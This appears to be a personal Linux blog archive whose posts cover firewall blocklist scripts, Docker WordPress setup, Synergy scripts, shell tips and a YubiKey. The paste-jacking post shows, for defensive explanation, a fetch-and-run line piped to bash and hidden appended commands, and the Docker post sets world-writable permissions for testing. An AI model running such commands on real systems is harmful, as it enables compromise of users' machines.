    Well, I’ve just learned about a project which I would have loved to have available back then. Project Wycheproof can help you test your crypto solutions against known problems and attacks. Featuring 80 tests probing at 40 known bugs, here’s a snip from the introduction:

    Project Wycheproof has tests for the most popular crypto algorithms, including

  • DH
  • DSA
  • ECDH
  • RSA

    The tests detect whether a library is vulnerable to many attacks, including

  • Invalid curve attacks
  • Biased nonces in digital signature schemes
  • Of course, all Bleichenbacher’s attacks
  • And many more — we have over 80 test cases

    Interesting stuff with exciting potential!

    Tags: , ,
    Permalink: 20161220.kicking.the.crypto.tires

    Sun, 13 Jul 2014

    Simple Protection with iptables, ipset and Blacklists

    Seems I’ve always just a few more things going on than I can comfortably handle. One of those is an innocent little server holding the beginnings of a new project.

    If you expose a server to the Internet, very quickly your ports are getting scanned and tested. If you’ve an SSH server, there are going to be attempts to login as ‘root’ which is why it is ubiquitously advised that you disable root login. Also why many advise against allowing passwords at all.

    We could talk for days about improvements; it’s usually not difficult to introduce some form of two-factor authentication (2FA) for sensitive points of entry such as SSH. You can install monitoring software like Logwatch which can summarize important points from your logs, such as: who has logged via SSH, how many times root was used, etc.

    DenyHosts and Fail2ban are great ways to secure things, according to your needs.

    DenyHosts works primarily with SSH and asks very little from you in way of configuration, especially if you’re using a package manager to install a version that is configured for the distribution on which you’re working. If you’re installing from source you may need to find where are your SSH logs (e.g., /var/log/secure, /var/log/auth.log). It’s extremely easy to set up DenyHosts to synchronize so that you’re automatically blocking widely-known offenders whether or not they’re after your server.

    In contrast, Fail2ban is going to take more work to get set up. However, it is extremely configurable and works with any log file you point it toward which means that it can watch anything (e.g., FTP, web traffic, mail traffic). You define your own jails which means you can ban problematic IP addresses according to preference. Ban bad HTTP attempts from HTTP only or stick their noses in the virtual corner and don’t accept any traffic from them until they’ve served their time-out by completely disallowing their traffic. You can even use Fail2ban to scan its own logs, so repeating offenders can be locked out for longer.
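
    That last trick, Fail2ban reading its own log, is what the stock recidive jail does. A sketch of switching it on in jail.local (option names and defaults shift a bit between versions, so treat this as illustrative):
    [recidive]
    enabled  = true
    logpath  = /var/log/fail2ban.log
    findtime = 86400   ; look back one day
    bantime  = 604800  ; ban repeat offenders for a week
    maxretry = 5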

    Today we’re going to assume that you’ve a new server that shouldn’t be seeing any traffic except from you and any others involved in the project. In that case, you probably want to block traffic pretty aggressively. If you’ve physical access to the server (or the ability to work with staff at the datacenter) then it’s better to err in the direction of accidentally blocking good guys than trying to be overly fault-tolerant.

    The server we’re working on today is a Debian Wheezy system. It has become a common misconception that Ubuntu and Debian are, for all intents and purposes, interchangeable. They’re similar in many respects and Ubuntu is great preparation for using Debian but they are not the same. The differences, I think, won’t matter for this exercise but I am unsure because this was written using Wheezy.

    Several minutes after bringing my new server online, I started seeing noise in the logs. I was still getting set up and really didn’t want to stop and take protective measures but there’s no point in securing a server after it’s been compromised. The default Fail2ban configuration was too forgiving for my use. It was scanning for 10 minutes and banning for 10 minutes. Since only a few people should be accessing this server, there’s no reason for anyone to be trying a different password every 15 minutes (for hours).

    I found a ‘close-enough’ script and modified it. Here, we’ll deal with a simplified version.

    First, let’s create a name for these ne’er-do-wells in iptables:
    iptables -N bad_traffic

    For this one, we’ll use Perl. We’ll look at our Apache log files to find people sniffing ‘round and we’ll block their traffic. Specifically, we’re going to check Apache’s ‘error.log’ for the phrases ‘File does not exist’ and ‘client denied by server configuration’ and block people causing those errors. This would be excessive for servers intended to serve the general populace. For a personal project, it works just fine as a ‘DO NOT DISTURB’ sign.

    #!/usr/bin/env perl
    use strict;
    use POSIX qw(strftime);

    my $log = ($ARGV[0] ? $ARGV[0] : "/var/log/apache2/error.log");
    my $chain = ($ARGV[1] ? $ARGV[1] : "bad_traffic");

    my @bad = `grep -iE 'File does not exist|client denied by server configuration' $log |cut -f8 -d" " | sed 's/]//' | sort -u`;
    my @ablk = `/sbin/iptables -S $chain|grep DROP|awk '{print \$4}'|cut -d"/" -f1`;

    foreach my $ip (@bad) {
        if (!grep $_ eq $ip, @ablk) {
            chomp $ip;
            `/sbin/iptables -A $chain -s $ip -j DROP`;
            print strftime("%b %d %T",localtime(time))." badht: blocked bad HTTP traffic from: $ip\n";
        }
    }

    That gives us some great, utterly unforgiving, blockage. Looking at the IP addresses attempting to pry, I noticed that most of them were on at least one of the popular block-lists.

    So let’s make use of some of those block-lists! I found a program intended to apply those lists locally but, of course, it didn’t work for me. Here’s a similar program; this one will use ipset for managing the block-list though only minor changes would be needed to use iptables as above:

    #!/usr/bin/env bash
    # Working/output files. These definitions were missing from the post;
    # the paths below are reasonable stand-ins -- adjust to taste.
    IP_TMP="/tmp/ip.tmp"
    IP_BLACKLIST_TMP="/tmp/ip-blacklist.tmp"
    IP_BLACKLIST="/etc/ip-blacklist.conf"

    WIZ_LISTS="chinese nigerian russian lacnic exploited-servers"

    BLACKLISTS=(
    "http://danger.rulez.sk/projects/bruteforceblocker/blist.php" # BruteForceBlocker IP List
    "http://rules.emergingthreats.net/blockrules/compromised-ips.txt" # Emerging Threats - Compromised IPs
    "http://www.spamhaus.org/drop/drop.txt" # Spamhaus Don't Route Or Peer List (DROP)
    "http://www.spamhaus.org/drop/edrop.txt" # Spamhaus Don't Route Or Peer List (DROP) Extended
    "http://cinsscore.com/list/ci-badguys.txt" # C.I. Army Malicious IP List
    "http://www.openbl.org/lists/base.txt" # OpenBL.org 90 day List
    "http://www.autoshun.org/files/shunlist.csv" # Autoshun Shun List
    "http://lists.blocklist.de/lists/all.txt" # blocklist.de attackers
    )

    for address in "${BLACKLISTS[@]}"
    do
        echo -e "\nFetching $address\n"
        curl "$address" >> $IP_TMP
    done

    for list in $WIZ_LISTS
    do
        wget "http://www.wizcrafts.net/$list-iptables-blocklist.html" -O - >> $IP_TMP
    done

    wget 'http://wget-mirrors.uceprotect.net/rbldnsd-all/dnsbl-3.uceprotect.net.gz' -O - | gunzip | tee -a $IP_TMP

    # keep CIDR ranges and single addresses, respectively
    grep -o '^[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[/][0-9]\{1,3\}' $IP_TMP | tee -a $IP_BLACKLIST_TMP
    grep -o '^[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^/]' $IP_TMP | tee -a $IP_BLACKLIST_TMP

    sed -i 's/\t//g' $IP_BLACKLIST_TMP

    # de-duplicate into the final list (this consolidation step is assumed)
    sort -u $IP_BLACKLIST_TMP > $IP_BLACKLIST
    rm $IP_TMP $IP_BLACKLIST_TMP

    wc -l $IP_BLACKLIST

    if hash ipset 2>/dev/null
    then
        ipset flush bloxlist
        while IFS= read -r ip
        do
            ipset add bloxlist $ip
        done < $IP_BLACKLIST
    else
        echo -e '\nipset not found\n'
    fi
    echo -e "\nYour bloxlist file is: $IP_BLACKLIST\n"

    Download here:

    Tags: , , , , , , , , , ,
    Permalink: 20140713.simple.protection.with.iptables.ipset.and.blacklilsts

    Tue, 18 Mar 2014

    Random datums with Random.org

    I was reading about the vulnerability in the ‘random’ number generator in iOS 7 (http://threatpost.com/weak-random-number-generator-threatens-ios-7-kernel-exploit-mitigations/104757) and thought I would share a method that I’ve used. Though, I certainly was not on any version of iOS but, at least, I can help in GNU/Linux and BSDs.

    What if we want to get some random numbers or strings? We need a salt or something and, in the interest of best practices, we’re trying to restrain the trust given to any single participant in the chain. That is, we do not want to generate the random data from the server that we are on. Let’s make it somewhere else!

    YEAH! I know, right? Where to get random data can be a headache-inducing challenge. Alas! The noble people at Random.org are using atmospheric noise to provide randomness for us regular folk!

    Let’s head over and ask for some randomness:

    Great! Still feels a little plain. What if big brother saw the string coming over and knew what I was doing? I mean, aside from the fact that I could easily wrap the string with other data of my choosing.

    Random.org is really generous with the random data, so why don’t we take advantage of that? Instead of asking for a single string, let’s ask for several. Nobunny will know which one I picked, except for me!

    We’ll do that by increasing the 'num' part of the request that we’re sending:

    They were also thinking of CLI geeks like us with the 'format' variable. We set that to 'plain' and all the fancy formatting for human eyes is dropped and we get a simple list that we don’t need to use any clever tricks to parse!
    curl -s 'https://www.random.org/strings/?num=25&len=16&digits=on&loweralpha=on&unique=on&format=plain&rnd=new'

    Now we’ve got 25 strings at the CLI. We can pick one to copy and paste. But what if we don’t want to do the picking? Well, we can use the local system to do that. We’ll have it pick a number between 1 and 25. RANDOM % 25 is zero-indexed, giving 0 through 24, so we’re going to increment by 1 so that our number is really between 1 and 25.
    echo $(( (RANDOM % 25)+1 ))

    Next, we’ll send our list to head with our random number. Head is going to give us the first X lines of what we send to it. So if our random number is 17, then it will give us the first 17 lines from Random.org
    curl -s 'https://www.random.org/strings/?num=25&len=16&digits=on&loweralpha=on&unique=on&format=plain&rnd=new' | head -$(( (RANDOM % 25)+1 ))

    After that, we’ll use the friend of head: tail. We’ll tell tail that we want only the last record of the list, of pseudo-random length, of strings that are random.
    curl -s 'https://www.random.org/strings/?num=25&len=16&digits=on&loweralpha=on&unique=on&format=plain&rnd=new' | head -$(( (RANDOM % 25)+1 )) | tail -1
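
    If this is something you’ll reach for often, the whole pipeline tucks nicely into a little function for your shell rc (the name is whatever you like):
    randorg_string() {
        curl -s 'https://www.random.org/strings/?num=25&len=16&digits=on&loweralpha=on&unique=on&format=plain&rnd=new' \
            | head -$(( (RANDOM % 25)+1 )) | tail -1
    }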

    And we can walk away feeling pretty good about having gotten some properly random data for our needs!

    Tags: ,
    Permalink: 20140318.random.data

    Mon, 17 Feb 2014

    Installing INN’s Project Largo in a Docker container

    Prerequisites: Docker, Git, SSHFS.

    Today we’re going to look at using Docker to create a WordPress installation with the Project Largo parent theme and a child theme stub for us to play with.

    Hart Hoover has established an image for getting a WordPress installation up and running using Docker. For whatever reason, it didn’t work for me out-of-box but we’re going to use his work to get started.

    Let’s make a place to work and move into that directory:
    cd ~
    mkdir project.largo.wordpress.docker
    cd project.largo.wordpress.docker

    We’ll clone the Docker/Wordpress project. For me, it couldn’t untar the latest WordPress. So we’ll download it outside the container, untar it and modify the Dockerfile to simply pull in a copy:
    git clone https://github.com/hhoover/docker-wordpress.git
    cd docker-wordpress/
    wget http://wordpress.org/latest.tar.gz
    tar xvf latest.tar.gz
    sed -i 's/ADD http:\/\/wordpress.org\/latest.tar.gz \/wordpress.tar.gz/ADD \.\/wordpress \/wordpress/' Dockerfile
    sed -i '/RUN tar xvzf \/wordpress\.tar\.gz/d' Dockerfile

    Then, build the project which may take some time.
    sudo docker build -t $ME/wordpress .

    If you’ve not the images ready for Docker, the process should begin with something like:
    Step 0 : FROM boxcar/raring
    Pulling repository boxcar/raring
    32737f8072d0: Downloading [> ] 2.228 MB/149.7 MB 12m29s

    And end something like:
    Step 20 : CMD ["/bin/bash", "/start.sh"]
    ---> Running in db53e215e2fc
    ---> 3f3f6489c700
    Successfully built 3f3f6489c700

    Once the project is built, we will start it and forward ports from the container to the host system, so that the Docker container’s site can be accessed through port 8000 of the host system. So, if you want to see it from the computer that you’ve installed it on, you could go to ‘HTTP://’. Alternatively, if your host system is already running a webserver, we could use SSHFS to mount the container’s files within the web-space of the host system.

    In this example, however, we’ll just forward the ports and mount the project locally (using SSHFS) so we can easily edit the files perhaps using a graphical IDE such as NetBeans or Eclipse.

    Okay, time to start our Docker image and find its IP address (so we can mount its files):
    DID=$(docker run -p 8000:80 -d $ME/wordpress)
    DIP=$(docker inspect $DID | grep IPAddress | cut -d '"' -f 4)
    docker logs $DID| grep 'ssh user password:' --color

    Copy the SSH password and we will make a local directory to access the WordPress installation of our container.
    cd ~
    mkdir largo.mount.from.docker.container
    sshfs user@$DIP:/var/www $HOME/largo.mount.from.docker.container
    cd largo.mount.from.docker.container
    PROJECT=$(pwd -P)

    Now, we can visit the WordPress installation and finish setting up. From the host machine, it should be ‘HTTP://’. There you can configure Title, Username, Password, et cet. and finish installing WordPress.

    Now, let’s get us some Largo! Since this is a test project, we’ll sacrifice security to make things easy. Our Docker WordPress site isn’t ready for us to easily install the Largo parent theme, so we’ll make the web directory writable by everybody. Generally, this is not a practice I would condone. It’s okay while we’re experimenting but permissions are very important on live systems!

    Lastly, we’ll download and install Largo and the Largo child theme stub.
    ssh user@$DIP 'sudo chmod -R 777 /var/www'
    wget https://github.com/INN/Largo/archive/master.zip -O $PROJECT/wp-content/themes/largo.zip
    unzip $PROJECT/wp-content/themes/largo.zip -d $PROJECT/wp-content/themes/
    mv $PROJECT/wp-content/themes/Largo-master $PROJECT/wp-content/themes/largo
    wget http://largoproject.wpengine.netdna-cdn.com/wp-content/uploads/2012/08/largo-child.zip -O $PROJECT/wp-content/themes/largo-child.zip
    unzip $PROJECT/wp-content/themes/largo-child.zip -d $PROJECT/wp-content/themes
    rm -rf $PROJECT/wp-content/themes/__MACOSX/

    We are now ready to customize our Project Largo child theme!

    Tags: , , , , , ,
    Permalink: 20140217.project.largo.docker

    Sat, 25 Jan 2014

    Network-aware Synergy client

    My primary machines are *nix or BSD variants, though I certainly have some Windows-based rigs also. Today we’re going to share some love with Windows 7 and PowerShell.

    One of my favorite utilities is Synergy. If you’re not already familiar, it allows you to seamlessly move from the desktop of one computer to another with the same keyboard and mouse. It even supports the clipboard so you might copy text from a GNU/Linux box and paste it in a Windows’ window. Possibly, they have finished adding drag and drop to the newer versions. I am not sure because I run a relatively old version that is supported by all of the machines that I use regularly.

    What’s the problem, then? The problem was that I was starting my Synergy client by hand. Even more disturbing, I was manually typing the IP address at work and at home, twice or more per weekday. This behavior became automated by my brain and continued for months unnoticed. But this is no kind of life for a geek such as myself, what with all this superfluous clicking and tapping!

    Today, we set things right!

    In my situation, the networks that I use happen to assign IP addresses from different subnets. If you’ve not the convenience of that situation then you might need to add something to the script. Parsing an ipconfig/ifconfig command, you could possibly use something like the Default Gateway or the Connection-specific DNS Suffix. Alternatively, you could check for the presence of some network share, a file on server or anything that would allow you to uniquely identify the surroundings.
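
    For instance, a check against the default gateway would look something like this (the gateway address is purely illustrative; it is an alternative to the subnet matching used in the scripts below):
    gateway=$(ip route | awk '/^default/ {print $3; exit}')
    if [ "$gateway" = "192.168.111.1" ]; then
        echo "Looks like the work network"
    fi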

    As I imagined it, I wanted the script to accomplish the following things

    • see if Synergy is running (possibly from the last location), if so ask if we need to kill it and restart so we can identify a new server
    • attempt to locate where we are and connect to the correct Synergy server
    • if the location is not identified, ask whether to start the Synergy client

    This is how I accomplished that task:

    # [void] simply supresses the noise made loading 'System.Reflection.Assembly'
    [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")

    # Define Synergy server IP addresses
    $synergyServerWork = ""
    $synergyServerHome = ""

    # Define partial IP addresses that will indicate which server to use
    $synergyWorkSubnets = "192.168.111", "192.168.115"
    $synergyHomeSubnets = "192.168.222", "192.168.225"

    # Path to Synergy Client (synergyc)
    $synergyClientProgram = "C:\Program Files\Synergy\synergyc.exe"

    # Path to Syngery launcher, for when we cannot identify the network
    $synergyLauncherProgram = "C:\Program Files\Synergy\launcher.exe"

    # Remove path and file extension to give us the process name
    $processName = $synergyClientProgram.Substring( ($synergyClientProgram.lastindexof("\") + 1), ($synergyClientProgram.length - ($synergyClientProgram.lastindexof("\") + 5) ))

    # Grab current IP address
    $currentIPaddress = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]

    # Find the subnet of current IP address
    $location = $currentIPaddress.Substring(0,$currentIPaddress.lastindexof("."))

    function BalloonTip ($message) {
        # Pop-up message from System Tray
        $objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
        $objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($synergyClientProgram)
        $objNotifyIcon.BalloonTipText = $message
        $objNotifyIcon.Visible = $True
        $objNotifyIcon.ShowBalloonTip(10000)   # display for up to ten seconds
    }


    # If Synergy client is already running, do we need to restart it?
    $running = Get-Process $processName -ErrorAction SilentlyContinue
    if ($running) {
        $answer = [System.Windows.Forms.MessageBox]::Show("Synergy is running.`nClose and start again?", "OHNOES", 4)
        if ($answer -eq "YES") {
            Stop-Process -name $processName
        }
        Else {
            Exit   # assumption: the user said no, so leave the running client alone
        }
    }

    # Do we recognize the current network?
    if ($synergyWorkSubnets -contains $location) {
        BalloonTip "IP: $($currentIPaddress)`nServer: $($synergyServerWork)`nConnecting to Synergy server at work."
        & $synergyClientProgram $synergyServerWork
    }
    ElseIf ($synergyHomeSubnets -contains $location) {
        BalloonTip "IP: $($currentIPaddress)`nServer: $($synergyServerHome)`nConnecting to Synergy server at home."
        & $synergyClientProgram $synergyServerHome
    }
    Else {
        $answer = [System.Windows.Forms.MessageBox]::Show("Network not recognized by IP address: {0}`n`nLaunch Synergy?" -f $currentIPaddress, "OHNOES", 4)
        if ($answer -eq "YES") {
            & $synergyLauncherProgram
        }
    }

    Then I saved the script in "C:\Program Files\SynergyStart\", created a shortcut and used the Change Icon button to make it the same as Synergy’s and made the Target:
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden & 'C:\Program Files\SynergyStart\synergy.ps1'

    Lastly, I copied the shortcut into the directory of things that run when the system starts up:
    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

    Now, Synergy connects to the needed server at home and work. If it can’t figure out where it is, it asks if it should run it at all.

    As they say, a millisecond saved is a millisecond earned.

    This post was very nearly published without a Linux equivalent. Nearly.

    Same trick for bash/zsh:
    #!/bin/zsh

    # Define Synergy server IP addresses (placeholders; fill in your own)
    synergyServerWork="192.168.111.10"
    synergyServerHome="192.168.222.10"

    # Define partial IP addresses that will indicate which server to use
    synergyWorkSubnets=("192.168.111" "192.168.115")
    synergyHomeSubnets=("192.168.222" "192.168.225")

    # Path to Synergy Client (synergyc)
    synergyClientProgram="/usr/bin/synergyc"

    # Path to QuickSynergy, for when we cannot identify the network
    synergyLauncherProgram="/usr/bin/quicksynergy"

    # Remove path and file extension to give us the process name
    processName=`basename $synergyClientProgram`

    # Grab current IP address (assumes a 192.x.x.x address is in use)
    currentIPaddress=`ip addr show | grep 192 | awk '{print $2}' | sed 's/inet //;s/\/.*//;s/ //g'`

    # Find the subnet of current IP address
    location=`echo $currentIPaddress | cut -d '.' -f 1,2,3`

    # If Synergy client is already running, do we need to restart it?
    running=`ps ax | grep -v grep | grep $processName`
    if [ -n "$running" ]
    then
        if zenity --question --ok-label="Yes" --cancel-label="No" --text="Synergy is running.\nClose and start again?"
        then
            pkill $processName
        else
            exit
        fi
    fi

    # Do we recognize the current network?
    for i in "${synergyWorkSubnets[@]}"
    do
        if [ "${i}" = "${location}" ]
        then
            notify-send "IP:$currentIPaddress Server:$synergyServerWork [WORK]"
            $synergyClientProgram $synergyServerWork
            exit
        fi
    done

    for i in "${synergyHomeSubnets[@]}"
    do
        if [ "${i}" = "${location}" ]
        then
            notify-send "IP:$currentIPaddress Server:$synergyServerHome [HOME]"
            $synergyClientProgram $synergyServerHome
            exit
        fi
    done

    if zenity --question --ok-label="Yes" --cancel-label="No" --text="Network not recognized by IP address: $currentIPaddress\nLaunch Synergy?"
    then
        $synergyLauncherProgram
    fi

    To get it to run automatically, you might choose to call the script from /etc/init.d/rc.local.
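    Since zenity and notify-send want a running desktop session, another route is an XDG autostart entry. A sketch (the Exec path is only an example; point it at wherever you saved the script), placed in ~/.config/autostart/synergy-client.desktop:

    [Desktop Entry]
    Type=Application
    Name=Synergy client
    Exec=/home/j0rg3/bin/synergy.sh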

    Download here:

    Tags: , ,
    Permalink: 20140125.network_aware_synergy_client

    Thu, 04 Jul 2013

    Preventing paste-jacking with fc

    Paste-jacking: what? It’s a somewhat tongue-in-cheek name representing that, when it comes to the web, what you see is not necessarily what you copy.

    Content can be hidden inside of what you’re copying. For example: ls /dev/null; echo " Something nasty could live here! 0_o ";

    Paste below to see what lurks in the <span> that you’re not seeing:

    If pasted to the command line, this could cause problems. It might seem trivial but it isn’t if you give it some thought. If a post presented what looked like a single, albeit very long, command line, extra commands could easily be slipped in without jumping out at you. Given the right kind of post, it could even involve a sudo and one might give very little thought to typing in a password, handing all power over. It could even be something like: wget -q "nasty-shell-code-named-something-harmless-sounding" -O-|bash

    Then it would, of course, continue with innocuous commands that might do something that takes your attention and fills your screen with things that look comforting and familiar, like an apt-get update followed by an upgrade.

    In this way, an unsuspecting end-user could easily install a root-kit on behalf of Evil Genius™.

    So what’s the cure?

    Some suggest that you never copy and paste from web pages. That’s solid advice. You’ll learn more by re-typing and nothing is going to be hidden. The downside is that it isn’t entirely practical. It’s bound to be one of those things that, in certain circumstances, we know we ought to do but don’t have the time or patience for, every single time.

    To the rescue comes our old friend fc! Designed for letting you build commands in a visual editor, it is perfect for this application. Just type fc at the command line and then paste from the web page into your text editor of choice. When you’re satisfied with the command, exit the editor. The line will be executed and there won’t be a shred of doubt about what, precisely, is being executed.

    This isn’t really the intended use of fc, so it’s a makeshift solution. fc opens with the last command already on screen. So, you do have to delete that before building your new command but it’s an insignificant inconvenience in exchange for the ability to know what’s going to run before it has a chance to execute.
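    A minimal setup, assuming Vim is what you want fc to open (Bash checks FCEDIT, then EDITOR; setting FCEDIT covers Zsh as well):

    # in ~/.bashrc or ~/.zshrc
    export FCEDIT=vim

    # then, when a web page hands you a command to run:
    fc
    # delete the pre-filled previous command, paste, inspect, then save and quit to execute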

    Read more at ush.it and h-online.com.

    Tags: , , ,
    Permalink: 20130704.prevent.paste-jacking.with.fc

    Wed, 26 Jun 2013

    Terminal suddenly Chinese

    The other day, I was updating one of my systems and I noticed that it had decided to communicate with me in Chinese. Since I don’t know a lick of Chinese, it made for a clumsy exchange.

    It was Linux Mint (an Ubuntu variant), so a snip of the output from an ‘apt-get upgrade’ looked like this: [screenshot: terminal output rendered in Chinese characters]

    I’m pretty sure I caused it — but there’s no telling what I was working on and how it slipped past me. Anyway, it’s not a difficult problem to fix but I imagine it could look like big trouble.

    So, here’s what I did:
    > locale

    The important part of the output was this:
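    (Representative values; the tell-tale is LANG and LANGUAGE disagreeing:)

    LANG=en_US.UTF-8
    LANGUAGE=zh_CN:zh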

    If you want to set your system to use a specific editor, you can set $EDITOR=vi and then you’re going to learn that some programs expect the configuration to be set in $VISUAL and you’ll need to change it there too.

    In a similar way, many things were using the en_US.UTF-8 set in LANG, but other things were looking to LANGUAGE and determining that I wanted Chinese.

    Having identified the problem, the fix was simple. Firstly, I just changed it in my local environment:
    > LANGUAGE=en_US.UTF-8

    That solved the immediate problem but, sooner or later, I’m going to reboot the machine and the Chinese setting would have come back. I needed to record the change somewhere for the system to know about it in the future.

    > vim /etc/default/locale

    Therein was the more permanent record, so I changed LANGUAGE there also, giving the result:
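    (Again representative, but after the edit the file reads along these lines:)

    LANG=en_US.UTF-8
    LANGUAGE=en_US.UTF-8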


    And now, the computer is back to using characters that I (more-or-less) understand.

    Tags: , , , , ,
    Permalink: 20130626.terminal.suddenly.chinese

    Thu, 13 Jun 2013

    Blogitechture continued… Simplify with Vim

    When we last discussed the structure and design of your own CLI-centric blog platform, we had some crude methods of starting and resuming posts before publishing.

    Today, let’s explore a little more of setting up a blogging-friendly environment, because we need to make the experience of blogging easy or we’ll grow tired of the hassle and lose interest.

    We can reasonably anticipate that we won’t want to be beleaguered with repetitious typing of HTML bits. If we’re going to apply paragraph tags, hyperlinks, codeblocks, etc. with any frequency, that task is best simplified. Using Vim as our preferred editor, we will use Tim Pope’s brilliant plug-ins ‘surround’ and ‘repeat’, combined with abbreviations, to take away the tedium.

    The plug-ins just need to be dropped into your Vim plugin directory (~/.vim/plugin/). The directory may not exist if you don’t have any plug-ins yet. That’s no problem, though. Let’s grab the plugins:

    cd ~/.vim/
    wget "http://www.vim.org/scripts/download_script.php?src_id=19287" -O surround.zip
    wget "http://www.vim.org/scripts/download_script.php?src_id=19285" -O repeat.zip

    Expand the archives into the appropriate directories:

    unzip surround.zip
    unzip repeat.zip

    Ta-da! Your Vim is now configured to quickly wrap (surround) in any variety of markup. When working on a blog, you might use <p> tags a lot by putting your cursor amid the paragraph and typing yss<p>. The plug-in will wrap it with opening and closing paragraph tags. Move to your next paragraph and then press . to repeat.

    That out of the way, let’s take advantage of Vim’s abbreviations for some customization. In our .vimrc file, we can define a few characters that Vim will expand according to their definition. For example, you might use:
    ab <gclb> <code class="prettyprint lang-bsh linenums:1">
    Then, any time you type <gclb> and press <enter>, you’ll get:
    <code class="prettyprint lang-bsh linenums:1">

    The next time that we take a look at blogitecture, we will focus on making the posts convenient to manage from our CLI.

    Tags: , , , ,
    Permalink: 20130613.blogitechture.continued

    Sun, 09 Jun 2013

    ixquick link maker

    In an effort to promote practical privacy measures, when I send people links to search engines, I choose ixquick. However, my personal settings submit my search terms via POST data rather than GET, meaning that the search terms aren’t in the URL.

    Recently, I’ve found myself hand-crafting links for people and then pasting each link into a new tab, to make sure I didn’t fat-finger anything. Not a problem per se, but the technique leaves room for a bit more efficiency. So I’ve taken the ‘A Search Box on Your Website’ tool offered by ixquick and slightly modified the code it offers so that it submits the search terms as GET variables and opens the results in a new tab, where I can then copy the URL and provide the link to others.

    You can test, or use, it here — I may add it (or a variant that just provides you the link) to the navigation bar above. First, though, I’m going to mention the idea to the outstanding minds at ixquick because it would make a LOT more sense on their page than on mine.

    Tags: ,
    Permalink: 20130609.ixquick.search

    Thu, 06 Jun 2013

    Managing to use man pages through simple CLI tips

    Recently, an author I admire and time-honored spinner of the Interwebs, Tony Lawrence, emphasized the value of using man pages (manual pages: the documentation available from the command line):
    > man ls
    as a sanity check before getting carried away with powerful commands. I didn’t know about this one but he has written about a situation in which killall could produce some shocking, and potentially quite unpleasant, results.

    Personally, I often quickly check man pages to be certain that I am using the correct flags or, as in the above case, anticipating results that bear some resemblance to what is actually likely to happen. Yet, it seems many people flock toward SERPs (Search Engine Results Pages: a tasteful replacement for mentioning any particular search engine by name, and also useful as a verb: “I dunno. You’ll have to SERP it.”) for this information.

    Perhaps the most compelling reason to head for the web is that it lets you leave the cursor amid the line you’re working on, without disturbing the command. SERPing the command, however, could easily lead you to information about a variant that is more common than the one available to you. More importantly, the information retrieved from the search engine is almost certainly written by someone who did read the man page — and may even come with the admonishment that you RTFM (Read The F#!$!*#’n Manual), as a testament to the importance of developing this habit.

    This can be made easier with just a few CLI shortcuts.

    <CTRL+u> to cut what you have typed so far and <CTRL+y> to paste it back.

    That is, you press <CTRL+u> and the line will be cleared, so you can then type man {command} and read the documentation. Don’t hesitate to jot quick notes of which flags you intend to use, if needed. Then exit the man page, press <CTRL+y> and finish typing right where you left off.

    This is another good use for screen or tmux but, let’s face it, there are times when you don’t want the overhead of opening another window for a quick look-up, and even instances when these tools aren’t available.

    A few other tips to make life easier when building complex commands:

    Use the command fc to open up an editor in which you can build your complex command and, optionally, even save it as a shell script for future reuse.

    Repeat the last word from the previous command (often a filename) with <ALT+.> or use an item from the last command by position, in reverse order:
    > ls -lahtr *archive*
    <ALT+1+.> : *archive*
    <ALT+2+.> : -lahtr
    <ALT+3+.> : ls

    You can also use Word Designators to use items from history, such as adding sudo to the last command typed by:
    sudo !!

    This allows for tricks like replacing bits of a previous command:
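    One example, using the caret quick-substitution that both Bash and Zsh support (the filename here is only for illustration):

    > tail /var/log/mesages
    > ^mesages^messages
    (the shell echoes and runs: tail /var/log/messages)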

    Lastly, if you need a command that was typed earlier, you can search history by pressing <CTRL+r> and start typing an identifying portion of the command.

    (Note: I have used these in Zsh and Bash, specifically. They can, however, be missing or overwritten; if a feature you want isn’t working, you can bind keys in a configuration file. Don’t just write it off: once you’ve solved the problem, it will never again be an intimidating one.)

    Happy hacking!

    Tags: , , , , , , , ,
    Permalink: 20130606.managing.to.use.man.pages

    Tue, 04 Jun 2013

    Painless protection with Yubico’s Yubikey

    Recently, I ordered a Yubikey and, in the comments section of the order, I promised to write about the product. At the time, I assumed that there was going to be something about which to write: (at least a few) steps of setting up and configuration or a registration process. They’ve made the task of writing about it difficult, by making the process of using it so easy.

    Plug it in. The light turns solid green and you push the button when you need to enter the key. That’s the whole thing!

    Physically, the device has a hole for a keychain or it can slip easily into your wallet. It draws power from the USB port on the computer, so there’s none stored in the device, meaning it should be completely unfazed if you accidentally get it wet.

    Let’s take a look at the device.

    > lsusb | grep Yubico

    Bus 005 Device 004: ID 1050:0010 Yubico.com Yubikey

    We see that it is on Bus 5, Device 4. How about a closer look?

    > lsusb -v -s5:4

    Bus 005 Device 004: ID 1050:0010 Yubico.com Yubikey
    Couldn't open device, some information will be missing
    Device Descriptor:
      bLength                18
      bDescriptorType         1
      bcdUSB               2.00
      bDeviceClass            0 (Defined at Interface level)
      bDeviceSubClass         0 
      bDeviceProtocol         0 
      bMaxPacketSize0         8
      idVendor           0x1050 Yubico.com
      idProduct          0x0010 Yubikey
      bcdDevice            2.41
      iManufacturer           1 
      iProduct                2 
      iSerial                 0 
      bNumConfigurations      1
      Configuration Descriptor:
        bLength                 9
        bDescriptorType         2
        wTotalLength           34
        bNumInterfaces          1
        bConfigurationValue     1
        iConfiguration          0 
        bmAttributes         0x80
          (Bus Powered)
        MaxPower               30mA
        Interface Descriptor:
          bLength                 9
          bDescriptorType         4
          bInterfaceNumber        0
          bAlternateSetting       0
          bNumEndpoints           1
          bInterfaceClass         3 Human Interface Device
          bInterfaceSubClass      1 Boot Interface Subclass
          bInterfaceProtocol      1 Keyboard
          iInterface              0 
            HID Device Descriptor:
              bLength                 9
              bDescriptorType        33
              bcdHID               1.11
              bCountryCode            0 Not supported
              bNumDescriptors         1
              bDescriptorType        34 Report
              wDescriptorLength      71
             Report Descriptors: 
               ** UNAVAILABLE **
          Endpoint Descriptor:
            bLength                 7
            bDescriptorType         5
            bEndpointAddress     0x81  EP 1 IN
            bmAttributes            3
              Transfer Type            Interrupt
              Synch Type               None
              Usage Type               Data
            wMaxPacketSize     0x0008  1x 8 bytes
            bInterval              10

